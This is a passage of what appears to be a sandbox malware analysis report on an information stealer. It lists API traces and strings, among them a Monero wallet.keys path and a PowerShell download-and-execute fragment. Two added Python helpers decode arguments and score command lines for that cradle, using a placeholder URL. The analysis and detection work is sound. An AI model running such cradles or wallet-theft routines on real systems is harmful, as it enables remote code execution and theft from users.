                          • Instruction ID: 0580d13ca69f7138c22d46f050cbc3e099e930e9e62716ec87d82a76ddcb8be1
                          • Opcode Fuzzy Hash: 3a3b9ee6ad7c4e9b1992eb041d418fb3c7dc28b7a5673b3ba2dd9819af7c8d7c
                          • Instruction Fuzzy Hash: F731E7B4A40218ABDB20CF54DC85BDCB7B4AB48704F5081D9BB09A7281CB706AC58FA9
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,018AF110,00000000,?,00B10E2C,00000000,?,00000000), ref: 00B08130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B08137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B08158
                          • wsprintfA.USER32 ref: 00B081AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: the same fourteen dump regions listed under the first function above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2922868504-3474575989
                          • Opcode ID: 0891cfd45e96e95f49737347e5fa7ff989f5b78417fdfd9bd6d5c8b0cdb1ae4f
                          • Instruction ID: d7f138b1a4213a84f6d8e5cc82bf0db97a762e750fb880eeb3d998f64ef49a25
                          • Opcode Fuzzy Hash: 0891cfd45e96e95f49737347e5fa7ff989f5b78417fdfd9bd6d5c8b0cdb1ae4f
                          • Instruction Fuzzy Hash: FD21F9B1A44318ABDB00DFD4DC49FAEBBB8EB48B10F104549F605BB2C0D77859018BA5
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B08426
                          • wsprintfA.USER32 ref: 00B08459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B0847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B0848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B08499
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,018AF170,00000000,000F003F,?,00000400), ref: 00B084EC
                          • lstrlen.KERNEL32(?), ref: 00B08501
                          • RegQueryValueExA.ADVAPI32(00000000,018AEFD8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00B10B34), ref: 00B08599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B08608
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B0861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: the same fourteen dump regions listed under the first function above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: e67fbe3f4d6e979edbbf86a7780854c617cfb17963ed1203904ab4c084da742c
                          • Instruction ID: 7dc1756754412d825a8c3637de2ff0d1e4234281c362bbc355f5d7d1cc2ce8bb
                          • Opcode Fuzzy Hash: e67fbe3f4d6e979edbbf86a7780854c617cfb17963ed1203904ab4c084da742c
                          • Instruction Fuzzy Hash: 6121BA71A102189BDB64DB54DC85FE9B7B8FB48700F00C5D9A649A6280DF71AA85CFE4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B076A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B076AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0189B9C8,00000000,00020119,00000000), ref: 00B076DD
                          • RegQueryValueExA.ADVAPI32(00000000,018AF068,00000000,00000000,?,000000FF), ref: 00B076FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B07708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: the same fourteen dump regions listed under the first function above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 3aee043626299482e3fc97699ddbade47266f69385312addc62e64b40c0860bb
                          • Instruction ID: 4af54410c1aff65e7ebab864ae90649ebe7adf5b621f0399809252a041e459b1
                          • Opcode Fuzzy Hash: 3aee043626299482e3fc97699ddbade47266f69385312addc62e64b40c0860bb
                          • Instruction Fuzzy Hash: 50014FB5B44308BBD700DBE8DC4DFA9BBB8EB48701F104099FA45D72D0DAB0A9448B61
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B0773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0189B9C8,00000000,00020119,00B076B9), ref: 00B0775B
                          • RegQueryValueExA.ADVAPI32(00B076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00B0777A
                          • RegCloseKey.ADVAPI32(00B076B9), ref: 00B07784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: the same fourteen dump regions listed under the first function above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: ba0230c8744a5675c08ddff66e8934c5705a0be5668a43b6a7adf68199ac9c68
                          • Instruction ID: 93dc711ec852d1effef2da11134f583ff4bdcea3d38023453bd17bc04ad3184b
                          • Opcode Fuzzy Hash: ba0230c8744a5675c08ddff66e8934c5705a0be5668a43b6a7adf68199ac9c68
                          • Instruction Fuzzy Hash: A30117F5B40308BBD700DBE4DC49FAEB7B8EB44701F104599FA45E7391DA715A448B61
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                          • LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: the same fourteen dump regions listed under the first function above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 8cb85fb8b331b10ab3b390e5d1b3317f47c98bdc285ce69e3ce55764d3c97d06
                          • Instruction ID: 4c5e8455640d8acb044edd7c3ed127ce959b9f45cc64ccec24cc8ecc1871d15e
                          • Opcode Fuzzy Hash: 8cb85fb8b331b10ab3b390e5d1b3317f47c98bdc285ce69e3ce55764d3c97d06
                          • Instruction Fuzzy Hash: D731D6B4A00209EFDB14DF94D985BAE77B5FF48390F108158F911A7390D778AA42CFA1
                          APIs
                          • lstrcat.KERNEL32(?,018AF3E0), ref: 00B047DB
                            • Part of subcall function 00B08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04801
                          • lstrcat.KERNEL32(?,?), ref: 00B04820
                          • lstrcat.KERNEL32(?,?), ref: 00B04834
                          • lstrcat.KERNEL32(?,0189A450), ref: 00B04847
                          • lstrcat.KERNEL32(?,?), ref: 00B0485B
                          • lstrcat.KERNEL32(?,018AE608), ref: 00B0486F
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B08D90: GetFileAttributesA.KERNEL32(00000000,?,00AF1B54,?,?,00B1564C,?,?,00B10E1F), ref: 00B08D9F
                            • Part of subcall function 00B04570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B04580
                            • Part of subcall function 00B04570: RtlAllocateHeap.NTDLL(00000000), ref: 00B04587
                            • Part of subcall function 00B04570: wsprintfA.USER32 ref: 00B045A6
                            • Part of subcall function 00B04570: FindFirstFileA.KERNEL32(?,?), ref: 00B045BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: the same fourteen dump regions listed under the first function above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: f2c0a44dd6178277ff74f58cbe3875991ea4303113b86a5719c5a02f4936cab9
                          • Instruction ID: 4652cd1021b325bdec24d9c8b28e5ba5b777e8ea7555525d8ec96ba210edd8ea
                          • Opcode Fuzzy Hash: f2c0a44dd6178277ff74f58cbe3875991ea4303113b86a5719c5a02f4936cab9
                          • Instruction Fuzzy Hash: F23171B2A00308A7CB10FBB4DC85EE977BCAB58700F4045C9B399960C1EE74D7898BA5
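The hex arguments in the traces above carry most of the analytic value once decoded: the InternetOpenUrlA flags 04000100 are INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE (fetch the payload without leaving it in the WinINet cache), InternetReadFile pulls 0x400-byte chunks, the two RegOpenKeyExA calls on HKLM (80000002) use 00020119 = KEY_READ | KEY_WOW64_64KEY so that this 32-bit process reads the 64-bit registry view for the OS version and CurrentBuildNumber, the CreateFileA routine is a plain GENERIC_READ / FILE_SHARE_READ / OPEN_EXISTING read of a whole file, and the SHGetFolderPathA subcall asks for CSIDL 0x1C, CSIDL_LOCAL_APPDATA, where browser profiles live. The following Python helper is an added example, not Joe Sandbox tooling and not code from the sample: it parses lines in the report's own format and maps the arguments to the documented Windows SDK constants. The embedded sample trace is constructed by copying lines from this section; the constant tables are deliberately small and anything they do not cover is left as hex.

```python
"""Decode the hex arguments in the report's API-trace lines.

Added example; not Joe Sandbox tooling and not code from the sample. It
parses lines in the report's own format ("• Api.MODULE(arg,...), ref: ADDR")
and maps the arguments to documented Windows SDK constants. The sample
trace is constructed from the lines in this section of the report.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: API lines copied from this report section.
SAMPLE_TRACE = """\
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00AF5011
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00AF5041
• RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B0847B
• RegOpenKeyExA.ADVAPI32(80000002,0189B9C8,00000000,00020119,00000000), ref: 00B076DD
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
• SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
"""

LINE_RE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\)"
                     r"(?:,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?")


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]   # None where the dump shows '?'
    ref: Optional[str]


def parse_trace(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue            # e.g. "wsprintfA.USER32 ref: ..." carries no argument list
        args = [None if a.strip() == "?" else int(a, 16)
                for a in m.group("args").split(",") if a.strip()]
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref")))
    return calls


# Documented Windows SDK values (small tables; uncovered bits stay hex).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_READ = 0x20019
REG_EXTRA = {0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY",
             0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY"}
INET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
              0x00800000: "INTERNET_FLAG_SECURE", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA",
         0x26: "CSIDL_PROGRAM_FILES", 0x28: "CSIDL_PROFILE"}


def flag_names(value: int, table: Dict[int, str]) -> str:
    """Expand a bit mask into SDK names; bits the table does not cover stay hex."""
    names = [name for bit, name in table.items() if value & bit == bit]
    for bit in table:
        value &= ~bit
    if value:
        names.append(f"0x{value:X}")
    return "|".join(names) or "0"


def describe(call: Call) -> str:
    """One analyst-readable line per call; a '?' argument aborts the decode."""
    a = call.args
    try:
        if call.api == "RegOpenKeyExA":
            hive = "existing handle" if a[0] == 0 else HIVES.get(a[0], f"0x{a[0]:X}")
            sam, parts = a[3], []
            if sam & KEY_READ == KEY_READ:
                parts.append("KEY_READ")
                sam &= ~KEY_READ
            if sam:
                parts.append(flag_names(sam, REG_EXTRA))
            return f"RegOpenKeyExA: hive={hive} access={'|'.join(parts)}"
        if call.api == "InternetOpenUrlA":
            return f"InternetOpenUrlA: flags={flag_names(a[4], INET_FLAGS)}"
        if call.api == "InternetReadFile":
            return f"InternetReadFile: reads {a[2]}-byte chunks"
        if call.api == "CreateFileA":
            return (f"CreateFileA: access={flag_names(a[1], ACCESS)} "
                    f"share={flag_names(a[2], SHARE)} "
                    f"disposition={DISPOSITION.get(a[4], str(a[4]))}")
        if call.api == "SHGetFolderPathA":
            folder = CSIDL.get(a[1], f"0x{a[1]:X}")
            return f"SHGetFolderPathA: folder={folder}"
    except (TypeError, IndexError):
        return f"{call.api}: argument not recovered from dump"
    return f"{call.api}: no decoder"


def triage(text: str) -> Dict[str, str]:
    """Map each call's ref address to its decoded description."""
    return {c.ref: describe(c) for c in parse_trace(text)}


if __name__ == "__main__":
    for ref, line in triage(SAMPLE_TRACE).items():
        print(ref, line)
```

The decoder keys on the ref address so a decoded line can be pasted back next to the function it came from. Arguments Joe Sandbox prints as `?` were not recoverable from the dump, and the helper says so rather than guessing; values such as the 05F5E0FF and 0098967F seen in the GetProcessHeap lines are leftover stack contents (the RtlAllocateHeap sizes), not GetProcessHeap parameters, so they are intentionally not decoded.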
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00B02D85
                          Strings
                          • <, xrefs: 00B02D39
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00B02D04
                          • ')", xrefs: 00B02CB3
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00B02CC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: the same fourteen dump regions listed under the first function above
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: aa14fb1515cc2118c41af410f4272379c7c081730a75c443ff0ce302b72500c0
                          • Instruction ID: 2fac6cf57b9122ea4d721c6df75dea1ba41c7f0178a358cbbe1287f495c4cf49
                          • Opcode Fuzzy Hash: aa14fb1515cc2118c41af410f4272379c7c081730a75c443ff0ce302b72500c0
                          • Instruction Fuzzy Hash: AC419C71D103089ADB14FBA0C896FEDBFB8AF14300F508599E116B61D1DF746A8ACF91
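The function above is the "Powershell download and execute" behaviour flagged in the signatures: the stealer concatenates the hard-coded SysWOW64 powershell.exe path, the fragment `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, a URL, and the closing `')"`, then hands the result to ShellExecuteEx. Because the pieces are concatenated at run time, a detection that looks for the literal string is brittle; scoring the command line for stacked cradle indicators is more robust. The following Python is an added example, not Joe Sandbox tooling and not the sample's code: it normalises a process-creation command line (Sysmon Event ID 1 or Security 4688 with command-line auditing enabled) and scores it against the cradle pattern and its common cheap obfuscations. The URL and all three sample command lines are constructed; the real stage-2 URL does not appear in this part of the report. The scorer does not base64-decode `-EncodedCommand` payloads, so an encoded cradle only picks up the `encoded` weight.

```python
"""Flag the PowerShell download cradle assembled by this sample.

Added example; not Joe Sandbox tooling and not code from the sample. The
report shows the stealer concatenating
    powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"
and launching it through ShellExecuteEx. This scores process command lines
(e.g. from Sysmon Event ID 1 or Security 4688) for that cradle and the cheap
obfuscations of it seen in the wild. The URL and all sample command lines
below are constructed; the real URL is not in this part of the report.
"""
import re
from typing import Dict, List


def normalize(cmdline: str) -> str:
    """Undo cheap obfuscation: backtick escapes, extra whitespace, mixed case."""
    return re.sub(r"\s+", " ", cmdline.replace("`", "")).lower()


# (name, regex over the normalized command line, weight)
INDICATORS = [
    ("powershell_host", r"(?:^|\\)powershell(?:\.exe)?\b", 1),
    ("no_profile",      r"(?:^| )-no?p(?:rofile)?\b", 1),
    ("command_switch",  r"(?:^| )-c(?:ommand)?\b", 0),
    ("iex",             r"\b(?:iex|invoke-expression)\b", 3),
    ("webclient",       r"net\.webclient", 2),
    ("download_call",   r"\.download(?:string|file|data)\(", 3),
    ("hidden_window",   r"-w(?:indowstyle)? hidden", 1),
    ("encoded",         r"(?:^| )-e(?:nc|ncodedcommand)?\b", 2),
    # 32-bit host on a 64-bit box: the SysWOW64 path this sample hard-codes
    ("wow64_host",      r"\\syswow64\\windowspowershell\\", 1),
]
THRESHOLD = 6   # iex plus a download call alone already crosses it


def score_cmdline(cmdline: str) -> Dict[str, object]:
    """Score one command line; 'hits' lists the indicators that fired."""
    norm = normalize(cmdline)
    hits = [name for name, pat, _ in INDICATORS if re.search(pat, norm)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    urls = re.findall(r"https?://[^\s'\")]+", cmdline, flags=re.I)
    return {"score": score, "hits": hits, "urls": urls,
            "suspicious": score >= THRESHOLD}


def scan(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Return the verdict for every command line that crosses the threshold."""
    return [r for r in (score_cmdline(c) for c in cmdlines) if r["suspicious"]]


# Constructed samples; example.invalid is a placeholder, not the sample's C2.
SAMPLES = [
    # 1. The cradle exactly as the report shows it being assembled
    r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"''',
    # 2. Backtick-split keywords and a hidden window
    r'''powershell.exe -w hidden -nop -c "I`E`X (New-Object Net.WebClient).Down`loadString('http://example.invalid/x')"''',
    # 3. Benign administrative use: same host binary, no cradle
    r'''C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Command Get-Service''',
]

if __name__ == "__main__":
    for verdict in scan(SAMPLES):
        print(verdict)
```

The weights are deliberately front-loaded on `iex` and the `.Download*(` call, since those two together are the cradle regardless of which host path, window style or profile switches surround them; the SysWOW64 path and `-nop` are corroborating context that also helps an analyst pivot back to this stealer family. The extracted URL is what you would hand to network-block or retro-hunt tooling.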
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AF9F41
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 29dc75fcf2165b7376ccc6f1f745236567eb7f6c82203323a3727d5b22898468
                          • Instruction ID: 1b51ebc9d0d5449932eb31310f4ec31d047cadf26b1287ea179f333d630fa574
                          • Opcode Fuzzy Hash: 29dc75fcf2165b7376ccc6f1f745236567eb7f6c82203323a3727d5b22898468
                          • Instruction Fuzzy Hash: 8A615E70A1030CEBDB24EFA4DD96FED77B5AF54304F408458FA0A5B291EB706A45CB52
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,018AE628,00000000,00020119,?), ref: 00B040F4
                          • RegQueryValueExA.ADVAPI32(?,018AF4B8,00000000,00000000,00000000,000000FF), ref: 00B04118
                          • RegCloseKey.ADVAPI32(?), ref: 00B04122
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04147
                          • lstrcat.KERNEL32(?,018AF5A8), ref: 00B0415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: dd8b406df14117b40a66442ff046d7e80d96a7e7220d95f88e39ac408fcda273
                          • Instruction ID: d6b4ece2152368ae2b0b4e7f09dc72b35ae4464d934126352d27b7999d7da6b2
                          • Opcode Fuzzy Hash: dd8b406df14117b40a66442ff046d7e80d96a7e7220d95f88e39ac408fcda273
                          • Instruction Fuzzy Hash: 9F4189B6900208ABDB14EBE4DC46FFE777DAB48300F404598B75597181EA759B888BE2
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00B0696C
                          • sscanf.NTDLL ref: 00B06999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B069B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B069C0
                          • ExitProcess.KERNEL32 ref: 00B069DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: 8cbb200d59cca25b86698f3912d04f55b959108e2f81227103d4326e97231c48
                          • Instruction ID: c592f9ae6debef8b358f8c854a5ba1fc4fdad973720448ee5e10f3aba06090db
                          • Opcode Fuzzy Hash: 8cbb200d59cca25b86698f3912d04f55b959108e2f81227103d4326e97231c48
                          • Instruction Fuzzy Hash: 0C21CBB5E14209ABCF04EFE8D945AEEBBF5FF48300F04856AE406E3250EB345615CBA5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B07E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0189BDF0,00000000,00020119,?), ref: 00B07E5E
                          • RegQueryValueExA.ADVAPI32(?,018AE728,00000000,00000000,000000FF,000000FF), ref: 00B07E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00B07E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 5a6b6e49d84f991543543a7f9e237a91a41ed691f8be16217321bebe1b068287
                          • Instruction ID: 3de29bb52b8e7a7496b456826006091ab5d7f1dc8ba854707393b730951e9906
                          • Opcode Fuzzy Hash: 5a6b6e49d84f991543543a7f9e237a91a41ed691f8be16217321bebe1b068287
                          • Instruction Fuzzy Hash: 49113AB1A44305ABD700DB98DD89FBBFBBCEB04B10F104199F605E7280DBB468018BA1
                          APIs
                          • StrStrA.SHLWAPI(018AEFF0,?,?,?,00B0140C,?,018AEFF0,00000000), ref: 00B0926C
                          • lstrcpyn.KERNEL32(00D3AB88,018AEFF0,018AEFF0,?,00B0140C,?,018AEFF0), ref: 00B09290
                          • lstrlen.KERNEL32(?,?,00B0140C,?,018AEFF0), ref: 00B092A7
                          • wsprintfA.USER32 ref: 00B092C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 5eef92e01f465854d2fd4628fac31f301438f02e7454422925912cc311543993
                          • Instruction ID: 8baffe7938fcd0b6335f2bc509bd44dc8cfbc9d2e05a29676d8cbb15fd846bc4
                          • Opcode Fuzzy Hash: 5eef92e01f465854d2fd4628fac31f301438f02e7454422925912cc311543993
                          • Instruction Fuzzy Hash: CB01DA75600208FFCB04DFECC989EAE7BB9EF48355F108588F9499B345C671AA40DBA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF12B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF12BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AF12D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AF12F5
                          • RegCloseKey.ADVAPI32(?), ref: 00AF12FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: ca34fe320c6ebbf797b39a334bff76bf78090d6bc24b9d6717e0af2969ff714b
                          • Instruction ID: 0d592c7d2fbdbe2f244f57aae2ffecbff27bbb515bdf8915930090900ebe9779
                          • Opcode Fuzzy Hash: ca34fe320c6ebbf797b39a334bff76bf78090d6bc24b9d6717e0af2969ff714b
                          • Instruction Fuzzy Hash: 6A01E1B9B40308BBDB04DFE4DC89FAEB7B8EB48701F108159FA45D7280D6759A058FA1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 3630829c4f5fd70d6739ced872021ae8f0cce57f4a3c1035077c16d4c84bc3f6
                          • Instruction ID: e088bd86bdb9add10dc34189b6128f43e040ac678c3a73ca152cce14f4a511a8
                          • Opcode Fuzzy Hash: 3630829c4f5fd70d6739ced872021ae8f0cce57f4a3c1035077c16d4c84bc3f6
                          • Instruction Fuzzy Hash: 5B41F5B110079C5EDB228B248D84FFBBFE8EB45704F1445E8E98A861C2D3719A44CF24
                          APIs
